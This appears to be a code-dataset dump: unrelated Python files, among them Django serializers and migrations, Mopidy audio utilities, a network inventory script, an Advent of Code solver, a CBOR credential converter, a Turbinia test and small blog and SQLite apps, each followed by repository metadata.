end = serializers.CharField(allow_null=True)
label = serializers.DateField()
type = serializers.CharField()
class ExtentSerializer(serializers.Serializer):
value = serializers.FloatField()
type = serializers.CharField()
class LanguageSerializer(serializers.Serializer):
expression = serializers.CharField()
identifier = serializers.CharField()
class SubnoteSerializer(serializers.Serializer):
type = serializers.CharField()
content = serializers.SerializerMethodField()
def get_content(self, obj):
"""Coerce content into a list so it can be serialized as JSON."""
return list(obj.content)
class NoteSerializer(serializers.Serializer):
type = serializers.CharField()
title = serializers.CharField()
source = serializers.CharField()
subnotes = SubnoteSerializer(many=True)
class RightsGrantedSerializer(serializers.Serializer):
act = serializers.CharField()
begin = serializers.DateField()
end = serializers.DateField()
restriction = serializers.CharField()
notes = NoteSerializer(many=True, allow_null=True)
class RightsStatementSerializer(serializers.Serializer):
determination_date = serializers.DateField()
type = serializers.CharField()
rights_type = serializers.CharField()
begin = serializers.DateField()
end = serializers.DateField()
copyright_status = serializers.CharField(allow_null=True)
other_basis = serializers.CharField(allow_null=True)
jurisdiction = serializers.CharField(allow_null=True)
notes = NoteSerializer(many=True, allow_null=True)
rights_granted = RightsGrantedSerializer(many=True)
class GroupSerializer(serializers.Serializer):
identifier = serializers.CharField()
title = serializers.CharField()
class ReferenceSerializer(serializers.Serializer):
title = serializers.CharField()
type = serializers.CharField(allow_null=True)
online = serializers.SerializerMethodField()
hit_count = serializers.IntegerField(allow_null=True)
online_hit_count = serializers.IntegerField(allow_null=True)
uri = serializers.SerializerMethodField()
dates = serializers.CharField(allow_null=True)
description = serializers.CharField(allow_null=True)
group = GroupSerializer(allow_null=True)
def get_online(self, obj):
return getattr(obj, "online", False)
def get_uri(self, obj):
if getattr(obj, "uri", None):
return obj.uri
basename = obj.type
if basename in ["person", "organization", "family", "software"]:
basename = "agent"
elif basename in ["cultural_context", "function", "geographic",
"genre_form", "occupation", "style_period", "technique",
"temporal", "topical"]:
basename = "term"
return reverse('{}-detail'.format(basename), kwargs={"pk": obj.identifier}).rstrip("/")
class BaseListSerializer(serializers.Serializer):
uri = serializers.SerializerMethodField()
type = serializers.CharField()
title = serializers.CharField()
dates = DateSerializer(many=True, allow_null=True)
def get_uri(self, obj):
basename = self.context.get('view').basename or obj.type
return reverse('{}-detail'.format(basename), kwargs={"pk": obj.meta.id}).rstrip("/")
class BaseDetailSerializer(serializers.Serializer):
uri = serializers.SerializerMethodField()
title = serializers.CharField()
type = serializers.CharField()
category = serializers.CharField(allow_null=True)
offset = serializers.IntegerField(allow_null=True)
group = GroupSerializer()
external_identifiers = ExternalIdentifierSerializer(many=True)
def get_uri(self, obj):
basename = self.context.get('view').basename or obj.type
return reverse('{}-detail'.format(basename), kwargs={"pk": obj.meta.id}).rstrip("/")
class AgentSerializer(BaseDetailSerializer):
agent_type = serializers.CharField()
description = serializers.CharField(allow_null=True)
dates = DateSerializer(many=True, allow_null=True)
notes = NoteSerializer(many=True, allow_null=True)
class AgentListSerializer(BaseListSerializer):
pass
class CollectionSerializer(BaseDetailSerializer):
level = serializers.CharField()
parent = serializers.CharField(allow_null=True)
languages = LanguageSerializer(many=True, allow_null=True)
description = serializers.SerializerMethodField()
extents = ExtentSerializer(many=True)
formats = serializers.ListField()
online = serializers.BooleanField()
dates = DateSerializer(many=True, allow_null=True)
notes = NoteSerializer(many=True, allow_null=True)
rights_statements = RightsStatementSerializer(many=True, allow_null=True)
agents = ReferenceSerializer(many=True, allow_null=True)
creators = ReferenceSerializer(many=True, allow_null=True)
terms = ReferenceSerializer(many=True, allow_null=True)
def get_description(self, obj):
return description_from_notes(getattr(obj, "notes", []))
class CollectionListSerializer(BaseListSerializer):
pass
class ObjectSerializer(BaseDetailSerializer):
languages = LanguageSerializer(many=True, allow_null=True)
parent = serializers.CharField(allow_null=True)
description = serializers.SerializerMethodField()
extents = ExtentSerializer(many=True, allow_null=True)
formats = serializers.ListField()
online = serializers.BooleanField()
dates = DateSerializer(many=True, allow_null=True)
notes = NoteSerializer(many=True, allow_null=True)
rights_statements = RightsStatementSerializer(many=True, allow_null=True)
agents = ReferenceSerializer(many=True, allow_null=True)
terms = ReferenceSerializer(many=True, allow_null=True)
def get_description(self, obj):
return description_from_notes(getattr(obj, "notes", []))
class ObjectListSerializer(BaseListSerializer):
pass
class TermSerializer(BaseDetailSerializer):
term_type = serializers.CharField()
collections = ReferenceSerializer(many=True, allow_null=True)
objects = ReferenceSerializer(many=True, allow_null=True)
class TermListSerializer(BaseListSerializer):
pass
class CollectionHitSerializer(serializers.Serializer):
"""Serializes data for collapsed hits."""
category = serializers.CharField(source="group.category")
dates = serializers.SerializerMethodField()
hit_count = serializers.IntegerField()
online_hit_count = serializers.IntegerField(allow_null=True)
title = serializers.CharField(source="group.title")
uri = serializers.SerializerMethodField()
creators = serializers.SerializerMethodField()
def get_dates(self, obj):
return [d.to_dict() for d in obj.group.dates]
def get_creators(self, obj):
if getattr(obj.group, "creators", None):
return [c.title for c in obj.group.creators]
else:
return []
def get_uri(self, obj):
return obj.group.identifier.rstrip("/")
class FacetSerializer(serializers.Serializer):
"""Serializes facets."""
def to_representation(self, instance):
resp = {}
for k, v in instance.aggregations.to_dict().items():
if "buckets" in v:
resp[k] = v["buckets"]
elif "name" in v: # move nested aggregations up one level
resp[k] = v["name"]["buckets"]
elif k in ["max_date", "min_date"]: # convert timestamps to year
value = (datetime.fromtimestamp(v["value"] / 1000.0).year) if v["value"] else None
resp[k] = {"value": value}
else:
resp[k] = v
return resp
class AncestorsSerializer(serializers.Serializer):
"""Provides a nested dictionary representation of ancestors."""
def serialize_ancestors(self, ancestor_list, tree, idx):
ancestor = ancestor_list[idx]
serialized = ReferenceSerializer(ancestor).data
tree_data = {**serialized, **tree}
if idx == len(ancestor_list) - 1:
new_tree = tree_data
return new_tree
else:
new_tree = {"child": tree_data}
return self.serialize_ancestors(ancestor_list, new_tree, idx + 1)
def to_representation(self, instance):
resp = {}
if instance:
resp = self.serialize_ancestors(instance, {}, 0)
return resp
| 35.247012
| 98
| 0.706228
| 8,626
| 0.97502
| 0
| 0
| 0
| 0
| 0
| 0
| 643
| 0.07268
|
42549d1737ce596628e42957af0838f8a820986b
| 828
|
py
|
Python
|
cmz/cms_news/migrations/0004_auto_20160923_1958.py
|
inmagik/cmz
|
e183f0c7203bda5efb1cbeb96f4f06a76aa91231
|
[
"MIT"
] | 1
|
2016-10-01T18:35:24.000Z
|
2016-10-01T18:35:24.000Z
|
cmz/cms_news/migrations/0004_auto_20160923_1958.py
|
inmagik/cmz
|
e183f0c7203bda5efb1cbeb96f4f06a76aa91231
|
[
"MIT"
] | 8
|
2016-09-14T21:39:09.000Z
|
2016-10-25T20:08:31.000Z
|
cmz/cms_news/migrations/0004_auto_20160923_1958.py
|
inmagik/cmz
|
e183f0c7203bda5efb1cbeb96f4f06a76aa91231
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-09-23 19:58
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('cms_news', '0003_auto_20160923_1956'),
]
operations = [
migrations.AddField(
model_name='news',
name='date',
field=models.DateField(auto_now_add=True, default=datetime.datetime(2016, 9, 23, 19, 58, 10, 395979, tzinfo=utc)),
preserve_default=False,
),
migrations.AddField(
model_name='newstranslation',
name='title',
field=models.CharField(default='Hello cmz', max_length=300),
preserve_default=False,
),
]
| 27.6
| 126
| 0.621981
| 617
| 0.745169
| 0
| 0
| 0
| 0
| 0
| 0
| 152
| 0.183575
|
42553eda4ebfb5ccb85d9727626440163f717d34
| 3,252
|
py
|
Python
|
mopidy/audio/utils.py
|
grdorin/mopidy
|
76db44088c102d7ad92a3fc6a15a938e66b99b0d
|
[
"Apache-2.0"
] | 6,700
|
2015-01-01T03:57:59.000Z
|
2022-03-30T09:31:31.000Z
|
mopidy/audio/utils.py
|
pnijhara/mopidy
|
7168787ea6c82b66e138fc2b388d78fa1c7661ba
|
[
"Apache-2.0"
] | 1,141
|
2015-01-02T09:48:59.000Z
|
2022-03-28T22:25:30.000Z
|
mopidy/audio/utils.py
|
pnijhara/mopidy
|
7168787ea6c82b66e138fc2b388d78fa1c7661ba
|
[
"Apache-2.0"
] | 735
|
2015-01-01T21:15:50.000Z
|
2022-03-20T16:13:44.000Z
|
from mopidy import httpclient
from mopidy.internal.gi import Gst
def calculate_duration(num_samples, sample_rate):
"""Determine duration of samples using GStreamer helper for precise
math."""
return Gst.util_uint64_scale(num_samples, Gst.SECOND, sample_rate)
def create_buffer(data, timestamp=None, duration=None):
"""Create a new GStreamer buffer based on provided data.
Mainly intended to keep gst imports out of non-audio modules.
.. versionchanged:: 2.0
``capabilites`` argument was removed.
"""
if not data:
raise ValueError("Cannot create buffer without data")
buffer_ = Gst.Buffer.new_wrapped(data)
if timestamp is not None:
buffer_.pts = timestamp
if duration is not None:
buffer_.duration = duration
return buffer_
def millisecond_to_clocktime(value):
"""Convert a millisecond time to internal GStreamer time."""
return value * Gst.MSECOND
def clocktime_to_millisecond(value):
"""Convert an internal GStreamer time to millisecond time."""
return value // Gst.MSECOND
def supported_uri_schemes(uri_schemes):
"""Determine which URIs we can actually support from provided whitelist.
:param uri_schemes: list/set of URIs to check support for.
:type uri_schemes: list or set or URI schemes as strings.
:rtype: set of URI schemes we can support via this GStreamer install.
"""
supported_schemes = set()
registry = Gst.Registry.get()
for factory in registry.get_feature_list(Gst.ElementFactory):
for uri in factory.get_uri_protocols():
if uri in uri_schemes:
supported_schemes.add(uri)
return supported_schemes
def setup_proxy(element, config):
"""Configure a GStreamer element with proxy settings.
:param element: element to setup proxy in.
:type element: :class:`Gst.GstElement`
:param config: proxy settings to use.
:type config: :class:`dict`
"""
if not hasattr(element.props, "proxy") or not config.get("hostname"):
return
element.set_property("proxy", httpclient.format_proxy(config, auth=False))
element.set_property("proxy-id", config.get("username"))
element.set_property("proxy-pw", config.get("password"))
class Signals:
"""Helper for tracking gobject signal registrations"""
def __init__(self):
self._ids = {}
def connect(self, element, event, func, *args):
"""Connect a function + args to signal event on an element.
Each event may only be handled by one callback in this implementation.
"""
if (element, event) in self._ids:
raise AssertionError
self._ids[(element, event)] = element.connect(event, func, *args)
def disconnect(self, element, event):
"""Disconnect whatever handler we have for an element+event pair.
        Does nothing if the handler has already been removed.
"""
signal_id = self._ids.pop((element, event), None)
if signal_id is not None:
element.disconnect(signal_id)
def clear(self):
"""Clear all registered signal handlers."""
for element, event in list(self._ids):
element.disconnect(self._ids.pop((element, event)))
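# usage sketch: a hedged illustration of the Signals bookkeeping. A real Gst
# element is not required to exercise it; the stub below only mimics the
# gobject-style connect/disconnect interface and is an assumption for
# demonstration purposes.
class _StubElement:
    """Minimal stand-in exposing gobject-style connect/disconnect."""

    def __init__(self):
        self.handlers = {}
        self._next_id = 0

    def connect(self, event, func, *args):
        self._next_id += 1
        self.handlers[self._next_id] = (event, func, args)
        return self._next_id

    def disconnect(self, signal_id):
        self.handlers.pop(signal_id, None)


def _demo_signals():
    element = _StubElement()
    signals = Signals()
    signals.connect(element, "pad-added", lambda *a: None)
    assert len(element.handlers) == 1
    signals.clear()  # disconnects everything that was registered
    assert not element.handlers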
| 31.882353
| 78
| 0.681119
| 995
| 0.305966
| 0
| 0
| 0
| 0
| 0
| 0
| 1,400
| 0.430504
|
425582d3b0bd9aebc3e98f0f395cf656db9c8b38
| 467
|
py
|
Python
|
day09/part1.py
|
mtn/advent16
|
0df34237485ee1246532e9eda0ef643e6950d13e
|
[
"MIT"
] | null | null | null |
day09/part1.py
|
mtn/advent16
|
0df34237485ee1246532e9eda0ef643e6950d13e
|
[
"MIT"
] | null | null | null |
day09/part1.py
|
mtn/advent16
|
0df34237485ee1246532e9eda0ef643e6950d13e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import re
with open("input.txt") as f:
content = f.read().strip()
ans = ""
i = 0
while i < len(content):
if content[i] == "(":
end = content[i:].find(")") + i
instr = content[i+1:end]
chars, times = map(int, content[i+1:end].split("x"))
to_copy = content[end+1:end+1+chars]
ans += times * to_copy
i = end + 1 + chars
else:
ans += content[i]
i += 1
print(len(ans))
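# hedged self-check: the loop above, wrapped as a length-only function and
# verified against the worked examples from the Advent of Code 2016 day 9
# puzzle statement.
def decompressed_length(s):
    out_len, i = 0, 0
    while i < len(s):
        if s[i] == "(":
            end = s[i:].find(")") + i
            chars, times = map(int, s[i+1:end].split("x"))
            out_len += times * chars  # repeated span is counted, not expanded
            i = end + 1 + chars
        else:
            out_len += 1
            i += 1
    return out_len

assert decompressed_length("ADVENT") == 6
assert decompressed_length("A(1x5)BC") == 7
assert decompressed_length("(3x3)XYZ") == 9
assert decompressed_length("X(8x2)(3x3)ABCY") == 18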
| 20.304348
| 60
| 0.509636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 44
| 0.094218
|
4255be118dbe243d9d0c4b4eac0548f7377725a0
| 2,825
|
py
|
Python
|
sa/profiles/Alcatel/AOS/get_inventory.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 84
|
2017-10-22T11:01:39.000Z
|
2022-02-27T03:43:48.000Z
|
sa/profiles/Alcatel/AOS/get_inventory.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 22
|
2017-12-11T07:21:56.000Z
|
2021-09-23T02:53:50.000Z
|
sa/profiles/Alcatel/AOS/get_inventory.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 23
|
2017-12-06T06:59:52.000Z
|
2022-02-24T00:02:25.000Z
|
# ----------------------------------------------------------------------
# Alcatel.AOS.get_inventory
# ----------------------------------------------------------------------
# Copyright (C) 2007-2014 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinventory import IGetInventory
class Script(BaseScript):
name = "Alcatel.AOS.get_inventory"
interface = IGetInventory
rx_ni = re.compile(
r"^\s+GBIC\s+(?P<int_number>\d+)\n"
r"\s+Manufacturer Name:\s+(?P<vendor>\S+)(|\s+),\n"
r"^\s+Part Number:\s+(?P<part_number>\S+)(|\s+),\n"
r"^\s+Hardware Revision:\s+(|(?P<hw_rev>\S+))(|\s+),\n"
r"^\s+Serial Number:\s+(?P<serial>\S+)(|\s+)(|\s+),\n",
re.IGNORECASE | re.MULTILINE | re.DOTALL,
)
def execute(self):
objects = []
# Chassis info
p = self.scripts.get_version()
objects += [
{
"type": "CHASSIS",
"number": None,
"vendor": "ALU",
"serial": p["attributes"].get("Serial Number"),
"description": "%s %s" % (p["vendor"], p["platform"]),
"part_no": p["platform"],
"revision": p["attributes"].get("HW version"),
"builtin": False,
}
]
        # Transceivers detected
iface = self.cli("show ni")
for match in self.rx_ni.finditer(iface):
number = match.group("int_number")
# type = match.group("int")
# vendor = match.group("vendor")
serial = match.group("serial")
hw_rev = match.group("hw_rev")
if not hw_rev:
hw_rev = "None"
part_no = match.group("part_number")
if "XFP-10G-LR" in part_no:
part = "NoName | Transceiver | 10G | XFP LR"
elif "SFP-LX" in part_no:
part = "NoName | Transceiver | 1G | SFP LX"
elif "SFP-LH" in part_no:
part = "NoName | Transceiver | 1G | SFP LH"
elif "GLC-BX" in part_no:
part = "Cisco | Transceiver | 1G | GLC-BX-D"
else:
part = "NoName | Transceiver | 1G | SFP SX"
objects += [
{
"type": "XCVR",
"number": number,
"vendor": "NONAME",
"serial": serial,
"description": "SFP Transceiver " + part_no,
"part_no": [part],
"revision": hw_rev,
"builtin": False,
}
]
return objects
| 36.217949
| 72
| 0.43469
| 2,362
| 0.836106
| 0
| 0
| 0
| 0
| 0
| 0
| 1,262
| 0.446726
|
42569d1c317bd48e4f4e7021e87396555e651ced
| 1,276
|
py
|
Python
|
db_conn.py
|
achhetr/Library-book-store-app
|
a85e9a26dba48119ce52abb5ee8219528e06ac30
|
[
"MIT"
] | null | null | null |
db_conn.py
|
achhetr/Library-book-store-app
|
a85e9a26dba48119ce52abb5ee8219528e06ac30
|
[
"MIT"
] | null | null | null |
db_conn.py
|
achhetr/Library-book-store-app
|
a85e9a26dba48119ce52abb5ee8219528e06ac30
|
[
"MIT"
] | null | null | null |
import sqlite3
class Database:
# create book always if not exists
def __init__(self,db):
self.conn = sqlite3.connect(db)
self.cur = self.conn.execute("CREATE TABLE IF NOT EXISTS book (id INTEGER PRIMARY KEY, " +
"title TEXT, author TEXT, year INTEGER, isbn INTEGER)")
self.conn.commit()
def insert(self,title,author,year,isbn):
self.cur.execute("INSERT INTO book VALUES (NULL,?,?,?,?)",(title,author,year,isbn))
self.conn.commit()
def view(self):
self.cur.execute("SELECT * FROM book")
rows = self.cur.fetchall()
return rows
def search(self,title="",author="",year="",isbn=""):
self.cur.execute("SELECT * FROM book WHERE title=? OR author=? " +
"OR year=? OR isbn=?",(title,author,year,isbn))
rows = self.cur.fetchall()
return rows
def delete(self,id):
self.cur.execute("DELETE FROM book WHERE id=?",(id,))
self.conn.commit()
def update(self,id,title,author,year,isbn):
self.cur.execute("UPDATE book SET title=?, author=?, " +
"year=?,isbn=? WHERE id=?", (title,author,year,isbn,id))
self.conn.commit()
def __del__(self):
self.conn.close()
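# usage sketch: a hedged smoke test -- the class works against an in-memory
# SQLite database, so no file is needed. The values below are illustrative.
if __name__ == '__main__':
    db = Database(':memory:')
    db.insert('Dune', 'Frank Herbert', 1965, 9780441013593)
    assert len(db.view()) == 1
    assert db.search(author='Frank Herbert')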
| 33.578947
| 98
| 0.579937
| 1,260
| 0.987461
| 0
| 0
| 0
| 0
| 0
| 0
| 375
| 0.293887
|
4258b13ddf592d8967b4cf56eb4a465b00010bc4
| 5,286
|
py
|
Python
|
edge-tool/cbor_converter.py
|
hckim-kornic/mbed-edge-kornic
|
b83ea92066fae7c274777aa27494d5524c577c12
|
[
"Apache-2.0"
] | null | null | null |
edge-tool/cbor_converter.py
|
hckim-kornic/mbed-edge-kornic
|
b83ea92066fae7c274777aa27494d5524c577c12
|
[
"Apache-2.0"
] | null | null | null |
edge-tool/cbor_converter.py
|
hckim-kornic/mbed-edge-kornic
|
b83ea92066fae7c274777aa27494d5524c577c12
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright 2018 ARM Ltd.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
import os
import cbor2
import struct
from pyclibrary import CParser
from collections import namedtuple
CERTIFICATE_KEYS = ('MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_CERTIFICATE',
'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_ROOT_CA_CERTIFICATE',
'arm_uc_default_certificate')
KEY_KEYS = ('MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_PRIVATE_KEY')
UPDATE_KEYS = ('arm_uc_default_certificate',
'arm_uc_class_id',
'arm_uc_vendor_id')
KEY_MAP = {
'MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_CERTIFICATE': 'mbed.BootstrapDeviceCert',
'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_ROOT_CA_CERTIFICATE': 'mbed.BootstrapServerCACert',
'MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_PRIVATE_KEY': 'mbed.BootstrapDevicePrivateKey',
'MBED_CLOUD_DEV_BOOTSTRAP_ENDPOINT_NAME': 'mbed.EndpointName',
'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_URI': 'mbed.BootstrapServerURI',
'MBED_CLOUD_DEV_ACCOUNT_ID': 'mbed.AccountID',
'MBED_CLOUD_DEV_MANUFACTURER': 'mbed.Manufacturer',
'MBED_CLOUD_DEV_MODEL_NUMBER': 'mbed.ModelNumber',
'MBED_CLOUD_DEV_SERIAL_NUMBER': 'mbed.SerialNumber',
'MBED_CLOUD_DEV_DEVICE_TYPE': 'mbed.DeviceType',
'MBED_CLOUD_DEV_HARDWARE_VERSION': 'mbed.HardwareVersion',
'MBED_CLOUD_DEV_MEMORY_TOTAL_KB': 'mbed.MemoryTotalKB',
'arm_uc_default_certificate': 'mbed.UpdateAuthCert',
'arm_uc_class_id': 'mbed.ClassId',
'arm_uc_vendor_id': 'mbed.VendorId'
}
ConfigParam = namedtuple('ConfigParam', ['Data', 'Name'])
Certificate = namedtuple('Certificate', ['Data', 'Format', 'Name'])
Key = namedtuple('Key', ['Data', 'Format', 'Name', 'Type'])
class CBORConverter():
def __init__(self, development_certificate, update_resource, cbor_file):
self.development_certificate = development_certificate
self.update_resource = update_resource
self.cbor_file = cbor_file
def __check_file_exists(self, path):
if not os.path.isfile(path):
print("File '%s' does not exist.")
return False
return True
def parse_c_file(self):
if not self.__check_file_exists(self.development_certificate) or \
not self.__check_file_exists(self.update_resource):
return None
values = {}
values.update(CParser([self.development_certificate]).defs.get('values'))
values.update(CParser([self.update_resource],
macros={
'MBED_CLOUD_DEV_UPDATE_ID' : 1,
'MBED_CLOUD_DEV_UPDATE_CERT' : 1
}).defs.get('values'))
return values
def create_cbor_data(self, vars):
cbor_data = {'Certificates': [],
'Keys' : [],
'ConfigParams': [],
'SchemeVersion': '0.0.1'}
use_bootstrap = 1 if 'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_URI' in vars.keys() else 0
cbor_data['ConfigParams'].append(ConfigParam(use_bootstrap, 'mbed.UseBootstrap')._asdict())
for key in vars.keys():
var = vars.get(key)
cbor_var_key = KEY_MAP.get(key, None)
if cbor_var_key:
if key in CERTIFICATE_KEYS:
                    byte_data = struct.pack('%sB' % len(var), *var)
certificate = Certificate(byte_data, 'der', cbor_var_key)._asdict()
cbor_data['Certificates'].append(certificate)
elif key in KEY_KEYS:
                    byte_data = struct.pack('%sB' % len(var), *var)
private_key = Key(byte_data, 'der', cbor_var_key, 'ECCPrivate')._asdict()
cbor_data['Keys'].append(private_key)
elif key in UPDATE_KEYS:
byte_data = struct.pack('%sB' % len(var), *var)
config_param = ConfigParam(byte_data, cbor_var_key)._asdict()
cbor_data['ConfigParams'].append(config_param)
else:
config_param = ConfigParam(var, cbor_var_key)._asdict()
cbor_data['ConfigParams'].append(config_param)
else:
print("Key %s not in KEY_MAP." % key)
return cbor_data
def convert_to_cbor(self):
vars = self.parse_c_file()
if not vars:
print("No variables parsed.")
else:
cbor_data = self.create_cbor_data(vars)
with open(self.cbor_file, 'wb') as out_file:
cbor2.dump(cbor_data, out_file)
| 40.661538
| 99
| 0.620885
| 2,896
| 0.547862
| 0
| 0
| 0
| 0
| 0
| 0
| 2,257
| 0.426977
|
4258ec1ee3116d288de649b3f19210bd3aa35e35
| 3,012
|
py
|
Python
|
turbinia/processors/archive_test.py
|
sa3eed3ed/turbinia
|
1eb4db37813f2bd44dcc2c3764e9411f6a2f9d97
|
[
"Apache-2.0"
] | 559
|
2015-09-16T21:55:12.000Z
|
2022-03-28T11:08:11.000Z
|
turbinia/processors/archive_test.py
|
sa3eed3ed/turbinia
|
1eb4db37813f2bd44dcc2c3764e9411f6a2f9d97
|
[
"Apache-2.0"
] | 630
|
2015-09-16T21:53:41.000Z
|
2022-03-25T07:03:32.000Z
|
turbinia/processors/archive_test.py
|
sa3eed3ed/turbinia
|
1eb4db37813f2bd44dcc2c3764e9411f6a2f9d97
|
[
"Apache-2.0"
] | 158
|
2015-12-06T20:39:32.000Z
|
2022-03-13T22:15:01.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the Archive processor to compress and decompress folders."""
from __future__ import unicode_literals
import os
import tarfile
import unittest
import tempfile
from random import randint
from shutil import rmtree
from turbinia.processors import archive
from turbinia import TurbiniaException
class ArchiveProcessorTest(unittest.TestCase):
"""Tests for Archive Processor."""
def setUp(self):
# Setup testing directories/variables.
self.test_files = []
self.base_output_dir = tempfile.mkdtemp(prefix='turbinia-test-local')
self.tmp_files_dir = os.path.join(self.base_output_dir, 'files')
self.tmp_archive = os.path.join(self.base_output_dir, 'files.tar.gz')
if not os.path.exists(self.tmp_files_dir):
os.makedirs(self.tmp_files_dir)
# Generate text files containing random numbers.
file_max = 10
counter = 0
while counter <= file_max:
file_name = 'file{0:s}.txt'.format(str(counter))
file_path = os.path.join(self.tmp_files_dir, file_name)
      with open(file_path, 'w+') as file_open:
        rand_nums = [randint(0, 1000) for i in range(50)]
        for i in rand_nums:
          file_open.write('%s\n' % str(i))
counter += 1
self.test_files.append(file_name)
archive.CompressDirectory(self.tmp_files_dir)
def tearDown(self):
# Remove testing directory for this unit test.
if os.path.exists(self.base_output_dir):
rmtree(self.base_output_dir)
def test_compressed_dir(self):
"""Tests the compression function"""
# Check if compressed directory matches expected output path.
self.assertEqual(
archive.CompressDirectory(self.tmp_files_dir), self.tmp_archive)
    # Check to confirm that the archive is a readable tar archive.
self.assertEqual(tarfile.is_tarfile(self.tmp_archive), True)
# Raise assertion if folder does not exist.
with self.assertRaises(TurbiniaException):
archive.CompressDirectory('blah')
def test_validate_tarfile(self):
"""Tests the validate function used to decompress tar files"""
# Raise exception for file that does not exist.
with self.assertRaises(TurbiniaException):
archive.ValidateTarFile('blah.no')
# Raise exception for a file with unsupported extension.
with self.assertRaises(TurbiniaException):
archive.ValidateTarFile(self.tmp_files_dir)
if __name__ == '__main__':
unittest.main()
| 33.842697
| 74
| 0.729416
| 2,056
| 0.682603
| 0
| 0
| 0
| 0
| 0
| 0
| 1,273
| 0.422643
|
42595d917949c306ffaf79514babf64460ba3c69
| 1,869
|
py
|
Python
|
blog.py
|
BenTimor/SerializationConceptSystem
|
0f85dc32063d270a5564cda3199d84d474e5d83e
|
[
"MIT"
] | 1
|
2020-11-13T22:21:47.000Z
|
2020-11-13T22:21:47.000Z
|
blog.py
|
BenTimor/SerializationConceptSystem
|
0f85dc32063d270a5564cda3199d84d474e5d83e
|
[
"MIT"
] | null | null | null |
blog.py
|
BenTimor/SerializationConceptSystem
|
0f85dc32063d270a5564cda3199d84d474e5d83e
|
[
"MIT"
] | null | null | null |
from utils import database
class Config:
config = None
def __init__(self, users, posts, comments):
self.users = users
self.posts = posts
self.comments = comments
Config.config = self
@staticmethod
def update():
database["concept", True]["config", "WHERE id=1"] = Config.config
@staticmethod
def setup():
try:
Config.config = database["concept", True]["config", "WHERE id=1"][0][0]
        except Exception:
Config.config = Config([User("Admin", "admin123", True)], [Post("Admin", 0, "Hello World!", "Lorem Ipsum")], {0: [Comment("Admin", "Lorem Ipsum")]})
database["concept", True]["config"] = Config.config
class User:
def __init__(self, name, password, is_admin=False):
self.name = name
self.is_admin = is_admin
self.password = password
@staticmethod
def new_user(name, password, is_admin=False):
Config.config.users.append(User(name, password, is_admin))
Config.update()
@staticmethod
def get_user(name):
for user in Config.config.users:
if user.name == name:
return user
class Post:
def __init__(self, user, id, title, content):
self.user = user
self.id = id
self.title = title
self.content = content
@staticmethod
def new_post(user, title, content):
Config.config.posts.append(Post(user, len(Config.config.posts), title, content))
Config.update()
class Comment:
def __init__(self, user, content):
self.user = user
self.content = content
@staticmethod
def new_comment(post, user, content):
        if post not in Config.config.comments:
Config.config.comments[post] = []
Config.config.comments[post].append(Comment(user, content))
Config.update()
| 29.666667
| 160
| 0.602996
| 1,835
| 0.981808
| 0
| 0
| 1,171
| 0.626538
| 0
| 0
| 146
| 0.078117
|
4259a696e067dbb5b562342c586a116816461462
| 29
|
py
|
Python
|
src/svr/tests/__init__.py
|
yottaawesome/fsnd-project-2
|
7ed478fa945a561a28af06dc8e4492a9fbea510a
|
[
"MIT"
] | 3
|
2019-05-04T12:30:00.000Z
|
2020-05-14T06:28:51.000Z
|
src/svr/tests/__init__.py
|
yottaawesome/fsnd-project-2
|
7ed478fa945a561a28af06dc8e4492a9fbea510a
|
[
"MIT"
] | 1
|
2019-05-05T01:30:37.000Z
|
2019-05-16T02:50:04.000Z
|
src/svr/tests/__init__.py
|
yottaawesome/fsnd-project-2
|
7ed478fa945a561a28af06dc8e4492a9fbea510a
|
[
"MIT"
] | 1
|
2020-03-27T07:12:40.000Z
|
2020-03-27T07:12:40.000Z
|
from .test_db import TestDal
| 14.5
| 28
| 0.827586
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
425afadcb24a0ea23083f2d7fe78d83b6b1403c9
| 971
|
py
|
Python
|
Owner/models.py
|
2000090063/Vehicle_Rental_System-SDP-2-
|
483d811aa239a226607b4bfb262c99da3be017b4
|
[
"MIT"
] | 3
|
2022-03-12T08:27:42.000Z
|
2022-03-17T12:16:16.000Z
|
Owner/models.py
|
2000090063/Vehicle_Rental_System-SDP-2-
|
483d811aa239a226607b4bfb262c99da3be017b4
|
[
"MIT"
] | null | null | null |
Owner/models.py
|
2000090063/Vehicle_Rental_System-SDP-2-
|
483d811aa239a226607b4bfb262c99da3be017b4
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
